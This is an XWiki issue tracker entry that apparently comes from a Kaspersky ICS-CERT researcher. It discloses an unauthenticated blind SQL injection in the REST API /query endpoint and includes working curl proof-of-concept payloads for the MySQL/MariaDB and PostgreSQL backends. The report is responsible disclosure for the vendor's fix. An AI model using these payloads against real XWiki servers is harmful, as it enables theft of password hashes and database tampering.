XWiki Platform
XWIKI-22691

SQL injection in query endpoint of REST API


    Description

      Hello,

      I am Sergey Anufrienko from Kaspersky ICS-CERT vulnerability research team.

      Recently I've discovered an HQL/SQL injection vulnerability in the XWiki REST API /query endpoint (initially discovered in 15.10.5, later verified to be present in the current latest versions 16.9.0/15.10.14). The vulnerability is present regardless of the used database backend (verified on MySQL/MariaDB/PostgreSQL).

      It is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled.

      Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries.

      I believe the vulnerability may be described by the following CVSSv3 vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:X/RC:X with a score of 9.7 and corresponds to CWE-564: SQL Injection: Hibernate.

      The vulnerability may be tested in a default installation of XWiki Standard Flavor, including using the official Docker containers.

      An example query which leads to SQL injection with the MySQL/MariaDB backend is shown below (the single quotes inside the q parameter are URL-encoded as %27 so the command runs unchanged in a POSIX shell):

      time curl 'http://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(1)%20%23%27&type=hql&distinct=0'

      When executed, the response from the server will come after a delay of exactly one second, indicating successful execution of the injected SQL statement.

      An example of a query for the PostgreSQL database backend is shown below:

      curl "https://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20%24%24='%24%24=concat(%20chr(%2061%20),(chr(%2039%20))%20)%20;select%201%20--%20comment'&type=hql&distinct=0"

      Both requests employ database-backend-dependent techniques for breaking out of the HQL query context, described, for example, here: https://www.sonarsource.com/blog/exploiting-hibernate-injections

      Let me know if you need any further assistance.

      Thank you!

People

    tmortagne Thomas Mortagne
    madprogrammer Sergey Anufrienko